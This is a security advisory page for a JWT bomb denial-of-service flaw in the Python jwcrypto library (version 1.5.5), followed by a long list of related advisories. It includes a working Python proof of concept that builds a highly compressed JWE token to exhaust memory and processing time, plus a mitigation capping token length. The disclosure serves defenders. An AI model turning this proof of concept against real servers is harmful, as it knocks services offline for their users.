Lucene search
GoogleOSV:GHSA-J857-7RVV-VJ97HistoryMar 06, 2024 - 8:00 p.m.
JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
2024-03-0620:00:56
Google
osv.dev
9
jwcrypto
jwt bomb attack
dos attack
jwe token
compression ratio
mitigation
maximum token length
microsoft azure
cve-2024-21319
Affected version
Vendor: https://github.com/latchset/jwcrypto
Version: 1.5.5
Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.
When the server processes this Token, it will consume a lot of memory and processing time.
Poc
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))
payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"zip": "DEF",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print("-----uncompress-----")
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
print("-----compress-----")
payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
<img width=“172” alt=“image” src=“https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785”>
Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also
been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing
attackers from exploiting this vulnerability with high compression ratio tokens.
References
[1] CVE-2024-21319
Related
github
github
JWCrypto vulnerable to JWT bomb Attack in `deserialize` function
2024-03-06 20:00:56
Microsoft ASP.NET Core project templates vulnerable to denial of service
2024-01-09 19:35:02
JWX vulnerable to a denial of service attack using compressed JWE message
2024-03-08 15:06:53
nessus
nessus
RHEL 7 : python-jwcrypto (Unpatched Vulnerability)
2024-05-11 00:00:00
Oracle Linux 9 : python-jwcrypto (ELSA-2024-2559)
2024-05-07 00:00:00
RHEL 9 : python-jwcrypto (RHSA-2024:2559)
2024-04-30 00:00:00
cve
cve
osv
osv
Moderate: python-jwcrypto security update
2024-04-30 00:00:00
Moderate: python-jwcrypto security update
2024-05-10 14:32:42
CVE-2024-28102
2024-03-21 02:52:23
prion
prion
Code injection
2024-03-14 22:53:57
Denial of service
2024-01-09 19:15:00
oraclelinux
oraclelinux
python-jwcrypto security update
2024-05-07 00:00:00
idm:DL1 and idm:client security update
2024-05-29 00:00:00
.NET 6.0 security update
2024-01-12 00:00:00
debiancve
debiancve
CVE-2024-28102
2024-03-21 02:52:23
CVE-2024-33664
2024-04-26 00:15:09
veracode
veracode
Denial Of Service (DoS)
2024-03-26 05:37:36
Denial Of Service (DoS)
2024-01-10 10:01:02
redhat
redhat
(RHSA-2024:2559) Moderate: python-jwcrypto security update
2024-04-30 11:38:51
(RHSA-2024:3267) Moderate: idm:DL1 and idm:client security update
2024-05-22 10:41:24
(RHSA-2024:0152) Important: .NET 8.0 security update
2024-01-10 15:18:52
almalinux
almalinux
Moderate: python-jwcrypto security update
2024-04-30 00:00:00
Important: .NET 7.0 security update
2024-01-10 00:00:00
Important: .NET 6.0 security update
2024-01-10 00:00:00
cgr
cgr
CVE-2024-28102 vulnerabilities
2024-05-19 03:07:16
wolfi
wolfi
CVE-2024-28102 vulnerabilities
2024-06-01 21:07:39
cvelist
cvelist
CVE-2024-21319 Microsoft Identity Denial of service vulnerability
2024-01-09 18:59:01
CVE-2024-33664
2024-04-25 00:00:00
redhatcve
redhatcve
ubuntucve
ubuntucve
rocky
rocky
python-jwcrypto security update
2024-05-10 14:32:42
.NET 6.0 security update
2024-01-12 19:57:42
.NET 8.0 security update
2024-01-12 19:57:42
mscve
mscve
Microsoft Identity Denial of service vulnerability
2024-01-09 08:00:00
alpinelinux
alpinelinux
CVE-2024-21319
2024-01-09 19:15:12
openvas
openvas
Ubuntu: Security Advisory (USN-6578-1)
2024-01-12 00:00:00
.NET Core Multiple Vulnerabilities (KB5033741)
2024-01-11 00:00:00
.NET Core Multiple Vulnerabilities (KB5033733)
2024-01-11 00:00:00
kaspersky
kaspersky
KLA62826 Multiple vulnerabilities in Microsoft Azure
2024-01-09 00:00:00
KLA62822 Multiple vulnerabilities in Microsoft Developer Tools
2024-01-09 00:00:00
ubuntu
ubuntu
.NET vulnerabilities
2024-01-11 00:00:00
mskb
mskb
.NET 8.0 Update - January 09, 2024 (KB5033741)
2024-01-09 08:00:00
.NET 7.0 Update - January 09, 2024 (KB5033734)
2024-01-09 08:00:00
.NET 6.0 Update - January 09, 2024 (KB5033733)
2024-01-09 08:00:00
ibm
ibm
rapid7blog
rapid7blog
Patch Tuesday - January 2024
2024-01-09 21:23:10